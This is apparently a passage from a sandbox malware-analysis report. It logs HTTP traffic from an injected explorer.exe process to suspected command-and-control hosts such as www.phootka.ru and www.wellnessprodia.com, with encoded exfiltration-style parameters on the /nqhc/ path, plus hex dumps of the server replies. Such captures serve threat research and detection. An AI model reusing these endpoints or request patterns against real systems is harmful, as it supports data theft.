                                                                                                                                                                          Data Ascii: ~SjVg3h6BFePU_2pCDJaCpbV3LBpOikNtygn57Qi7gt1UagCRIqjHKOkNs4-NlIQQ6kNk8GzdZ3QdCUs4W1XpsS8uwwKz2jBw3U_5zT4mpeiPwkwcBzFqjHXqWX6V9nG~U9KBScccrPCtVohMRY1IlF8w2SO41ymWYDUPZZb9dOXNIcfR7ORIJbULTVqsa30j1HG~gbjMVB862Whzm73by~9zvfJtUcKhioQrkft(O4LTlH3oly
                                                                                                                                                                          Dec 5, 2022 15:15:04.976583004 CET11107OUTData Raw: 50 2d 50 62 7e 6d 69 31 42 52 57 4d 34 52 43 63 54 4e 45 56 7a 67 65 4c 6e 79 7e 48 6c 35 30 73 6b 52 76 50 4e 54 6a 55 54 74 47 4f 52 58 42 45 57 55 55 43 6d 4d 78 30 62 58 54 73 72 58 4b 68 51 33 39 2d 52 47 69 74 35 5f 58 57 53 70 78 76 67 44
                                                                                                                                                                          Data Ascii: P-Pb~mi1BRWM4RCcTNEVzgeLny~Hl50skRvPNTjUTtGORXBEWUUCmMx0bXTsrXKhQ39-RGit5_XWSpxvgD0Yb_jIkA2r26IGxWyZ~yw8HWJZ0V(K7DwyDrT_Z9hqguHOeJXNcFOsHHhbPsk157Z_VRilRViy6uSZUZ0aNQTUaWxc2DoJauvsU9NrUqo3qAOzB4e71LcqWZXiIqagcgUSe8JPH5~Qs5J4vGyZzDjf5a3dFyxyXgX
                                                                                                                                                                          Dec 5, 2022 15:15:04.976922989 CET11110OUTData Raw: 51 4b 35 44 41 78 41 52 7a 38 64 6d 66 38 6c 65 69 35 58 79 71 47 61 50 51 48 6d 77 28 4d 72 4e 33 59 33 56 43 4b 61 32 64 67 43 36 50 4a 34 35 73 72 4a 6e 74 69 48 4f 56 6b 54 46 41 68 43 4c 6b 47 4b 7a 49 7a 48 62 43 70 4a 4d 33 5f 5a 6c 50 75
                                                                                                                                                                          Data Ascii: QK5DAxARz8dmf8lei5XyqGaPQHmw(MrN3Y3VCKa2dgC6PJ45srJntiHOVkTFAhCLkGKzIzHbCpJM3_ZlPu1qFy5q2fPrTWQtcRrXGJlOIwX_iy(2(hyzAFU-PAuG7AePB2gtfhc0gp8Xi_Mijfx2k3LJQbS3zjuk16sNJh6WZ3npCRYdfJPSBhPCEZQqOigY48OKAh7qVilFv-KzxyxX0KspZCLvGXBm3AVas5uTte90ERW1lrJ
                                                                                                                                                                          Dec 5, 2022 15:15:04.977248907 CET11113OUTData Raw: 50 63 54 43 57 6b 51 75 39 6c 75 33 51 66 36 30 50 76 53 54 54 32 59 67 4b 51 59 52 4d 78 68 71 51 4f 4c 33 50 77 49 38 43 36 59 49 54 4a 6c 75 55 52 7a 66 77 6c 43 64 75 6f 46 76 65 42 4c 4c 56 4f 69 77 28 52 63 64 57 37 55 69 7e 53 78 6b 55 64
                                                                                                                                                                          Data Ascii: PcTCWkQu9lu3Qf60PvSTT2YgKQYRMxhqQOL3PwI8C6YITJluURzfwlCduoFveBLLVOiw(RcdW7Ui~SxkUdEvfHKCMOjKbgocShE7cmb9PaRxVxp-CEkyAMqWjxnzzzGmIYYejT2OfWRw1NJXzZjCio00DHviXzYdkFBvtDiVj8Lxp1ZaqcbtnidNt9hI59tlDTZ0Ff3jjC8PJDo-7-kSqrEiv0aX2abnLziHWNpMop6C8dYLawZ
                                                                                                                                                                          Dec 5, 2022 15:15:04.977452040 CET11114OUTData Raw: 66 6b 4e 62 74 54 62 56 4b 47 6e 55 48 46 65 57 62 55 41 4a 67 65 55 45 46 79 28 68 48 52 7e 50 51 45 48 58 67 57 78 6f 41 71 59 52 39 52 30 2d 6f 75 6b 64 6d 47 30 70 37 4c 70 49 54 2d 6d 48 58 42 51 32 66 49 69 34 34 5f 30 49 62 79 79 5f 45 36
                                                                                                                                                                          Data Ascii: fkNbtTbVKGnUHFeWbUAJgeUEFy(hHR~PQEHXgWxoAqYR9R0-oukdmG0p7LpIT-mHXBQ2fIi44_0Ibyy_E661JwEWVGi1oIqEozzANiLJ(vhAuYuWlkabidr2c5xP5ztw7knJIb52xL45~OOhAAW8SC6Eq9HsnniYnruFmvj26WbmzqNn27xinw6FHrvpa08dwnaH1MApHvGqdRETVP44GMX-vkZ7iVPuDnL48FhC0kT5xB47tOS
                                                                                                                                                                          Dec 5, 2022 15:15:04.977581024 CET11115OUTData Raw: 32 68 49 52 36 46 65 73 56 4a 53 6c 76 79 6b 61 52 46 6c 6b 78 63 33 72 53 41 45 53 66 38 43 50 5a 50 45 6f 34 46 47 4d 52 6e 4f 53 34 49 35 58 78 46 52 61 39 41 39 49 54 69 62 35 6c 55 67 78 68 2d 67 4e 51 4a 6d 48 6c 2d 43 68 39 58 38 52 55 48
                                                                                                                                                                          Data Ascii: 2hIR6FesVJSlvykaRFlkxc3rSAESf8CPZPEo4FGMRnOS4I5XxFRa9A9ITib5lUgxh-gNQJmHl-Ch9X8RUH76uHKmNDz0H_(Go8TwzYCkEvXc(fTYiiIH0skb9jBG3jG4xHuf7gzBh3SUkw5WJlk-4tpxk1oQxw3L09x1T7UnRbjfvoVnyD3gNpo1b_HlLU4OEDmNfEx3mfNs2qnKIRTs(8NQJXANjYiRL5ISN-Rx8djIqJS0ql(
                                                                                                                                                                          Dec 5, 2022 15:15:04.977924109 CET11118OUTData Raw: 69 39 28 63 35 67 31 4a 4a 6e 51 44 6c 4c 74 34 5a 73 58 47 57 61 51 63 75 72 46 49 49 41 44 68 4d 43 66 32 6e 32 64 30 71 38 4a 58 42 33 4f 32 65 66 6d 38 64 38 64 33 57 6e 4e 39 64 52 6c 4c 71 6d 46 54 76 4e 73 4e 32 72 5a 57 77 76 52 34 72 42
                                                                                                                                                                          Data Ascii: i9(c5g1JJnQDlLt4ZsXGWaQcurFIIADhMCf2n2d0q8JXB3O2efm8d8d3WnN9dRlLqmFTvNsN2rZWwvR4rBimaTRCw9(BvbVUL4A-mawf35Bp7H3cCFonRYxHatmViT~s2glAuXBMJkHdxdYL~vPV1N2BRtrX8Rh2Sk(y4H0I3D0gy1neJTsv1WVOMnRQIVAS9TyAWYmawKoBh7Za2ddJkcrhxJmzCeMvOl3TlecgKovEK-R1b_Z
                                                                                                                                                                          Dec 5, 2022 15:15:04.978534937 CET11121OUTData Raw: 4d 49 78 4e 62 30 6b 70 51 70 30 46 46 34 42 4d 77 51 44 64 4b 79 77 4e 4c 46 59 42 4f 6c 58 55 70 46 55 6e 33 6c 62 78 34 39 68 63 35 33 5a 57 51 47 76 66 68 67 6d 64 28 75 77 31 73 49 5a 42 32 32 7a 4c 78 70 46 51 48 48 59 77 61 61 78 68 4b 6b
                                                                                                                                                                          Data Ascii: MIxNb0kpQp0FF4BMwQDdKywNLFYBOlXUpFUn3lbx49hc53ZWQGvfhgmd(uw1sIZB22zLxpFQHHYwaaxhKktSd3eOuQNUwkXnHOtxkdxyl9w4ktQS5iuFfbHVks0MUn(0Y0GIDn0ySl85GvwvrREe2BU7PmAwpK4336lTnl9nt2kjzENhrKTrPbRFvj(GA9hBY2zu5709MHra(FlBD1gHjoR4ohuqiIZUQvVCEwMJG1~s7JCPOqC
                                                                                                                                                                          Dec 5, 2022 15:15:04.978740931 CET11122OUTData Raw: 48 63 6d 49 56 49 78 76 5a 69 30 50 6d 35 69 4a 59 51 5a 33 34 34 38 45 50 52 6f 72 7e 74 38 78 34 48 6c 39 47 33 55 4b 54 51 65 4d 4c 35 41 6e 77 63 63 56 46 52 42 47 53 6d 6a 4e 68 53 53 65 34 65 59 52 66 36 6b 47 4f 73 31 62 46 68 4c 6d 57 6d
                                                                                                                                                                          Data Ascii: HcmIVIxvZi0Pm5iJYQZ3448EPRor~t8x4Hl9G3UKTQeML5AnwccVFRBGSmjNhSSe4eYRf6kGOs1bFhLmWm3Vd45NZKQq(ClUYWreFcv3MlLQqONMTQcl4MaONrn6aExAL2AS4iYB4jN2bDYQiWGxQao8mtIrxX2NC4hvKXLYXOzCj_IgFAiumiZqjVLBZDSjReuyHHR3msSmY0owtWNsCfMWYbLpbGYUqDP_IpDGUzXrj_5mPHj
                                                                                                                                                                          Dec 5, 2022 15:15:04.978910923 CET11124OUTData Raw: 68 41 38 4d 4c 56 57 50 4c 4b 39 30 65 57 6d 31 45 50 37 53 5a 33 59 35 54 71 48 4d 69 5f 6e 66 35 59 75 47 4b 6f 68 6a 43 67 4e 4d 4a 4f 33 6a 66 44 71 64 6e 4a 72 4a 51 76 53 5f 28 31 31 43 38 36 39 37 56 52 6b 52 30 58 5a 5f 59 78 5a 6c 6e 4c
                                                                                                                                                                          Data Ascii: hA8MLVWPLK90eWm1EP7SZ3Y5TqHMi_nf5YuGKohjCgNMJO3jfDqdnJrJQvS_(11C8697VRkR0XZ_YxZlnLLhV30YdOopz0hGVSHAAXBvPIIG7ui1XgvfdyyGxMrGM7j8qMSxoYoUfLyr~-PXJl(4E5k_f5BLXnb5xVD-7l~slQDTMzqDfJzUQ9p7oBq4mwLtM9jJ1fqLdomGhasu30Ed7A4OZZNFMnFzTwNphRHYCRwd7zKJWWG
                                                                                                                                                                          Dec 5, 2022 15:15:05.134186983 CET11143INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx-reuseport/1.21.1
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:05 GMT
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          50192.168.11.2049892195.24.68.2380C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:44.890521049 CET12094OUTGET /nqhc/?7nWHV=nxEpVeNHnARypVRSWPzq+Yc9yhVf8J7idG64BP0ay1SSlgh8opdyHa7T5FU3HpxZiEIb1VwF2iL8pFHt356/ltXz75Eg7AD5bw==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.phootka.ru
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:17:44.945007086 CET12095INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:44 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Content-Length: 39481
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; }
                                                                                                                                                                          Dec 5, 2022 15:17:44.945063114 CET12096INData Raw: 6f 75 74 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e
                                                                                                                                                                          Data Ascii: output.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++];
                                                                                                                                                                          Dec 5, 2022 15:17:44.945091963 CET12098INData Raw: 74 61 20 2f 20 64 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: ta / damp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floo
                                                                                                                                                                          Dec 5, 2022 15:17:44.945117950 CET12099INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("puny
                                                                                                                                                                          Dec 5, 2022 15:17:44.945147038 CET12100INData Raw: 30 2c 20 6c 65 6e 20 3d 20 6f 75 74 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20
                                                                                                                                                                          Data Ascii: 0, len = output.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.enco
                                                                                                                                                                          Dec 5, 2022 15:17:44.945173979 CET12101INData Raw: 30 3b 20 6a 20 3c 20 69 6e 70 75 74 5f 6c 65 6e 67 74 68 3b 20 2b 2b 6a 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a
                                                                                                                                                                          Data Ascii: 0; j < input_length; ++j) { ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow
                                                                                                                                                                          Dec 5, 2022 15:17:44.945200920 CET12103INData Raw: 6f 41 53 43 49 49 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 20 64 6f 6d 61 69 6e 20 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20
                                                                                                                                                                          Data Ascii: oASCII = function ( domain ) { var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za
                                                                                                                                                                          Dec 5, 2022 15:17:44.945226908 CET12104INData Raw: 65 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: een; } .logo { padding: 30px 40px; } .content { display: flex; justify-content: space-between; margin: 0 82px; } .left { display: fl
                                                                                                                                                                          Dec 5, 2022 15:17:44.945328951 CET12105INData Raw: 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                                                                                                                                          Data Ascii: : 15px; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0 100 42" fill="none" xmlns="http://www.w3.org/2
                                                                                                                                                                          Dec 5, 2022 15:17:44.945358038 CET12107INData Raw: 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 33 2e 31 35 30 39 20 31 34 2e 31 37 38 38 43 35 33 2e
                                                                                                                                                                          Data Ascii: 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556 12.7287 52.7556 12.47C52.455 12.211 52.0227
                                                                                                                                                                          Dec 5, 2022 15:17:44.997735023 CET12108INData Raw: 36 34 30 35 20 31 30 2e 30 34 39 34 43 36 35 2e 39 36 37 38 20 31 30 2e 30 34 39 34 20 36 35 2e 33 35 32 31 20 31 30 2e 31 37 35 37 20 36 34 2e 37 39 32 20 31 30 2e 34 32 35 37 43 36 34 2e 32 33 31 37 20 31 30 2e 36 37 37 39 20 36 33 2e 36 31 33
                                                                                                                                                                          Data Ascii: 6405 10.0494C65.9678 10.0494 65.3521 10.1757 64.792 10.4257C64.2317 10.6779 63.6136 11.0274 62.9346 11.475L63.2065 10.3343L58.7385 10.3351L58.2337 12.5144H59.3852L57.5098 20.6619H60.8287L62.5044 13.3418C62.9323 13.1149 63.3172 12.9453 63.6601


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          51192.168.11.2049894192.232.217.12580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:50.660666943 CET12142OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.wellnessprodia.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.wellnessprodia.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.wellnessprodia.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 52 41 6f 2d 6a 64 53 6e 68 68 6a 4b 53 6d 75 33 33 41 34 61 62 6f 78 70 37 5f 53 71 58 62 32 73 76 30 37 68 28 51 77 37 70 48 77 61 6a 6b 34 71 46 68 5a 33 6e 58 43 62 79 62 6b 44 71 50 53 55 34 6a 37 57 6d 64 51 6f 6a 42 59 61 7a 70 59 75 38 72 65 43 44 75 6d 47 61 32 6b 64 79 68 78 42 47 42 34 31 5a 33 47 35 42 4b 32 42 7e 35 78 75 44 59 44 72 76 6f 47 62 47 4c 57 47 36 72 66 4c 51 46 46 32 6f 4f 46 35 75 78 45 36 77 2d 30 59 30 41 7e 34 42 58 37 43 33 68 39 38 48 6f 59 55 51 36 75 35 30 63 44 4d 45 34 55 50 6f 31 35 38 4a 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=RAo-jdSnhhjKSmu33A4aboxp7_SqXb2sv07h(Qw7pHwajk4qFhZ3nXCbybkDqPSU4j7WmdQojBYazpYu8reCDumGa2kdyhxBGB41Z3G5BK2B~5xuDYDrvoGbGLWG6rfLQFF2oOF5uxE6w-0Y0A~4BX7C3h98HoYUQ6u50cDME4UPo158Jg).
                                                                                                                                                                          Dec 5, 2022 15:17:50.832380056 CET12143INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:50 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                          Last-Modified: Fri, 01 May 2020 23:50:34 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Content-Length: 462
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00
